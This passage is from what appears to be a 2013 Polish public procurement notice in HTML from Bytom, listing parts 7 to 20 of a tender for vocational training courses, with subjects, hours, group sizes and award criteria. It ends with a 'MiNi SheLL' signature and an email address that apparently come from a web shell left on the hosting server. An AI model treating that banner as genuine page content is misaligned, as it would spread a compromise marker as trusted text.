7.	Prowadzenie salonu pielęgnacji zwierząt - kontakt z klientem, reklama, organizacja pracy.

Zamówienie obejmuje przeszkolenie od 8 do 10 osób, w dwóch grupach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> CZĘŚĆ VII 

Kosmetyka zachowawczo - upiększająca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 300 i następujące przedmioty nauczania:

1.	Kosmetologia;
2.	Anatomia;
3.	Dermatologia;
4.	Chemia kosmetyczna;
5.	Masaż;
6.	Fizykoterapia;
7.	Dietetyka;
8.	Higiena;
9.	Obsługa klienta;
10.	Zajęcia praktyczne:
	Określanie i ustalanie kształtu łuku brwiowego dla danego kształtu twarzy;
	Rozpoznawanie rodzaju cery;
	Wykonywanie klasycznych zabiegów pielęgnacyjnych przeznaczonych do 	podstawowych  rodzajów cery;
	Wykonywanie depilacji ciepłym woskiem kończyn dolnych  i górnych; 
	Wykonywanie depilacji ciepłym woskiem dołów pachowych, strefy bikini i wąsików;
	Przeprowadzenie diagnozy stanu skóry, biustu, ramion, łokci, kolan;
11. Mikrodermabrazja;
12.Elementy wizażu;
13.	Przepisy BHP;
14.	Pierwsza pomoc przedlekarska .

Zamówienie obejmuje łącznie od 12 do 18 osób, w trzech edycjach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> CZĘŚĆ VIII 

Krawiectwo lekkie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 300 godz. i następujące przedmioty nauczania:

1.	Maszyny do szycia, overlock, rodzaje szwów maszynowych i ich rodzaje;
2.	Nauka szycia ręcznego;
3.	Korzystanie z żurnali, nauka dopasowywania wykrojów do figury;
4.	Układanie form, krojenie odzieży;
5.	Wykonywanie konstrukcji odzieży podstawowej;
6.	Szycie odzieży miarowej o prostych krojach;
7.	Szycie różnych typów kieszeni;
8.	Szycie kołnierzy,
9.	Wszywanie zamków;
10.	Szycie odzieży z zastosowaniem podszewek;
11.	Zdejmowanie miary i przygotowanie do pierwszej przymiarki;
12.	Modelowanie na płasko i na manekinie;
13.	Materiałoznawstwo odzieżowe ( rodzaje tkanin, dodatki krawieckie, nici odzieżowe, podszewki, rodzaje zapięć, konserwacja odzieży);
14.	Nauka szycia na maszynie, overlocku, dziurkarce.

Zamówienie obejmuje łącznie od 5 do 6 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> CZĘŚĆ IX

Kasjer - fakturzysta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 80 i następujące przedmioty nauczania:

1.	Zakres i obowiązki kasjera;
2.	Elementy towaroznawstwa handlowego;
3.	Dokumentacja handlowa i magazynowa;
4.	Rozliczenie i dokumentacja finansowa;
5.	Dokumentacja wymiany zagranicznej;
6.	Praktyczna obsługa kas fiskalnych (rodzaje i zastosowanie urządzeń fiskalnych, programowanie kas fiskalnych, transmisja danych z kas fiskalnych do programów magazynowych i księgowych, rozpoznanie i kontrola znaków pieniężnych);
7.	Podstawy obsługi komputera;
8.	Komputerowe programy do fakturowania (ewidencja kontrahentów, ewidencja towarów, cen i marż, rejestr sprzedaży i zakupów, kontrola stanów magazynowych.

Zamówienie obejmować będzie łącznie od 16 do 20 osób, w dwóch edycjach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> CZĘŚĆ X 

Monter instalacji wod.- kan. - gaz. i CO z uprawnieniami gazowymi i lutowaniem płomieniowym twardym i miękkim rur miedzianych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 400 godz. i następujące przedmioty nauczania:

1.	Instalacja wod.-kan.-gaz i CO, 
2.	Elementy składowe, 
3.	Rodzaje rysunku zawodowego instalacji sanitarnej, 
4.	Czytanie projektu technicznego, 
5.	Rury i kształtki, 
6.	Rodzaje armatury, 
7.	Narzędzia pomiarowe,
8.	Przygotowanie wykopów, układanie rur w wykopach
9.	Lutowanie miedzi;
10.	Zgrzewanie rurociągów z tworzyw sztucznych metodą polifuzyjną elektrooporową i doczołową;
11.	Przepisy BHP,
12.	Pierwsza pomoc przedlekarska

Absolwenci szkolenia otrzymają świadectwo kwalifikacyjne G-3/E

Zamówienie obejmuje łącznie od  12 do 16 osób, w dwóch grupach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> CZĘŚĆ XI 

Monter instalacji solarnych, klimatyzacyjnych i wentylacyjnych z uprawnieniami SEP do 1 kV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 132 godz. i następujące przedmioty nauczania:

1. Przepisy budowlane w zakresie montażu instalacji klimatyzacyjnych, wentylacyjnych i solarnych; 
2. BHP na budowie; 
3. Zasady pracy na wysokościach; 
4. Przepisy przeciwpożarowe przy pracach z użyciem palników i elektronarzędzi;
5. Cele stosowania klimatyzacji, wentylacji i instalacji solarnych; 
6. Obliczanie zapotrzebowania; 
7. Dobieranie kolektorów, zasobników; 
8. Instalacja sterowania; 
9. Projektowanie, montaż, de-montaż, konserwacja instalacji klimatyzacyjnych, wentylacyjnych i solarnych; 
10. Typy agregatów; 
11. Centrale klimatyzacyjne; 
12. Systemy wentylacji pożarowej, regulacji powietrza i zakańczające instalacje wentylacyjne;
13. Uprawnienia SEP:
a)   Materiałoznawstwo; 
b)	Instalacje elektroenergetyczne;
c)	Eksploatacja instalacji elektroenergetycznych;
d)	Zasady BHP i przeciwpożarowe;
e)	Ratownictwo;
f)	Pomiary eksploatacyjne.


Absolwenci szkolenia otrzymają świadectwo kwalifikacyjne G-1/E i G-2/E

Zamówienie obejmuje łącznie od 8 do 10 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> CZĘŚĆ XII

Operator ładowarki kl. III do 2,5 m3 ze wstępnym stażem pracy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 202 i następujące przedmioty nauczania:

1.	Użytkowanie eksploatacyjne; 
2.	Dokumentacja techniczna;
3.	Przepisy BHP; 
4.	Podstawy elektrotechniki;
5.	Silniki spalinowe;
6.	Elementy hydrauliki; 
7.	Budowa ładowarek jednonaczyniowych
8.	Technologia robót 
9.	Zajęcia praktyczne .

Zamówienie obejmuje łącznie 14 do 18 osób i realizowane będzie w dwóch edycjach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> CZĘŚĆ XIII 

Operator sprzętu sprzątającego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 150. Szkolenie musi zawierać następujące przedmioty nauczania:

1.	Technologia prac porządkowych;
2.	Nowoczesne urządzenia i osprzęt wykorzystywany w procesie sprzątania 
	i konserwacji /odkurzacze przemysłowe do zbierania na mokro i sucho, szorowarki do 	mycia powierzchni twardych, zamiatarki bezpyłowe, myjki wysokociśnieniowe, 	mikrociągniki i ciągniki kompaktowe/;
3.	Instruktaż prac porządkowych realizowanych ręcznie i w formie zmechanizowanej;
4.	Kompleksowe sprzątanie dużych obiektów;
5.	Czyszczenie i konserwacja posadzek;
6.	Pranie wykładzin dywanowych, żaluzji i tapicerki meblowej;
7.	Pierwsza pomoc przedlekarska;
8.	Zagadnienia z zakresu przepisów BHP i p. poż. na stanowisku pracy z urządzeniami sprzątającymi. 

Zamówienie obejmuje przeszkolenie od 8 do 10 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> CZĘŚĆ XIV 

Operator  wózków jezdniowych z modułem wymiany butli gazowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 48 i następujące przedmioty nauczania:

1.	Typy stosowanych wózków widłowych,
2.	Budowa wózka
3.	Czynności  kierowcy przy obsłudze wózków przed podjęciem pracy i po pracy wózkami;
4.	Czynności kierowcy w czasie pracy;
5.	Wiadomości z zakresu ładunkoznawstwa;
6.	Wiadomości z zakresu BHP, o dozorze technicznym;
7.	Przygotowanie kierowcy do wykonywania czynności wymiany butli;
8.	Praktyczna nauka jazdy: 
	a) jazda wózkiem jezdniowym bez obciążenia przód, tył, ósemkowanie, jazda do celu;
	b) jazda wózkiem jezdniowym bez i z obciążeniem przód, tył, ósemkowanie, jazda do 
	celu;
	c) jazda wózkiem jezdniowym z obciążeniem przód, tył, ósemkowanie, jazda do celu, 	    paletowanie, wysokie składowanie.


Zamówienie obejmuje łącznie od 24 do 30 osób, w pięciu  grupach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> CZĘŚĆ XV 

Podstawy kadrowo płacowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 150. Szkolenie musi zawierać następujące bloki tematyczne:

1.	Podstawy prawne funkcjonowania firmy;
2.	Prawo pracy, kodeks pracy i zagadnienia kadrowe;
3.	Podstawy prawne funkcjonowania firmy;
4.	Płace, ubezpieczenia społeczne;
5.	Rekrutacja pracowników;
6.	Teczki osobowe;
7.	Rodzaje umów o pracę;
8.	Zawarcie i rozwiązanie stosunku pracy;
9.	Zdarzenia kadrowe - urlopy, choroby, wypadki, zasiłki itp.;
10.	Raporty kadrowe;
11.	Obsługa komputera i komputerowych programów biurowych;
12.	Obsługa programu Symfonia;
13.	Obsługa programu PŁATNIK.

Zamówienie obejmuje przeszkolenie od 24 do 30 osób, trzy grupy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> CZĘŚĆ XVI 

Kucharz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 200 godz. i następujące przedmioty nauczania:

1.	Zasady żywienia;
2.	Przygotowanie stanowiska pracy w kuchni;
3.	Technika mycia maszyn i urządzeń kuchennych, konserwacja maszyn;
4.	Obróbka termiczna: gotowanie, smażenie, pieczenie, duszenie;
5.	Towaroznawstwo;
6.	Wiadomości BHP w gastronomii;
7.	Potrawy specjalistyczne;
8.	Zajęcia praktyczne;
9.	Obsługa kas fiskalnych;
10.	Pierwsza pomoc przedlekarska.

Zamówienie obejmuje łącznie od 8 do 10 osób, w dwóch edycjach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> CZĘŚĆ XVII 

Tworzenie i obsługa sklepu internetowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 60 godz. i następujące przedmioty nauczania:
1. Podstawowe zadania systemów CMS (systemów zarządzania treścią);
2. Dobór hostingu lub własnego serwera w celu korzystania ze sklepu internetowego;
3. Instalacja i obsługa systemu:
a)	Zarządzanie treścią strony;
b)	Modyfikacja układu strony;
c)	Używanie szablonów;
d)	Korzystanie z komponentów, modułów, dodatków;
e)	Administrowanie kontami użytkowników.
4. Opublikowanie i zainstalowanie z własną witryną sklepową w sieci Internet.

Zamówienie obejmuje łącznie od 6 do 8 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> CZĘŚĆ XVIII 

Uprawnienia SEP do 1 kV z pomiarami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 60 godz. i następujące przedmioty nauczania:

1.	Materiałoznawstwo; 
2.	Instalacje elektroenergetyczne;
3.	Eksploatacja instalacji elektroenergetycznych;
4.	Zasady BHP i przeciwpożarowe;
5.	Ratownictwo;
6.	Pomiary eksploatacyjne.

Zamówienie obejmuje łącznie od 8 do 10 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> CZĘŚĆ XIX 

Wizażysta - stylista.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 100. Szkolenie musi zawierać następujące bloki tematyczne:

1.	Zarys historii ubioru;
2.	Analiza sylwetki;
3.	Omówienie stylów i dobór stylu do osoby;
4.	Rola dodatków, tła i światła;
5.	Psychologia kreowania wizerunku postaci;
6.	Makijaż dzienny, wieczorowy i ślubny;
7.	Makijaż do fotografii;
8.	Nowe trendy w makijażu;
9.	Elementy charakteryzacji;
10.	Analiza typu urody, fryzura i makijaż a typ urody.

Zamówienie obejmuje przeszkolenie od 10 do 12 osób, w dwóch edycjach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> CZĘŚĆ XX

Wykorzystanie narzędzi społecznościowych do komunikacji i pracy grupowej w Internecie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 80 godz. i następujące przedmioty nauczania:
1. Tworzenie i obsługa serwisu społecznościowego na podstawie CMS-a:
a)	Tworzenie i obsługa strony internetowej typu BLOG;
b)	Zasady działania for dyskusyjnych na przykładzie PHPBB;
2. Wykorzystywanie serwisów typu FACEBOOK i TWITTER w celu tworzenia własnych kontaktów, informacji, sieci i grup;
a)	Użycie w/w aplikacji we własnych serwisach i stronach.
3. Technologie społecznościowe GOOGLE;
a)	Zakładanie własnego konta na portalu Google;
b)	Użycie narzędzia Kalendarz - organizacja i synchronizacja ze znajomymi;
c)	Użycie narzędzia DYSK - tworzenie i udostępnianie dokumentów online;
d)	Użycie narzędzia Witryna internetowa.

Zamówienie obejmuje łącznie od 8 do 10 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0, 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com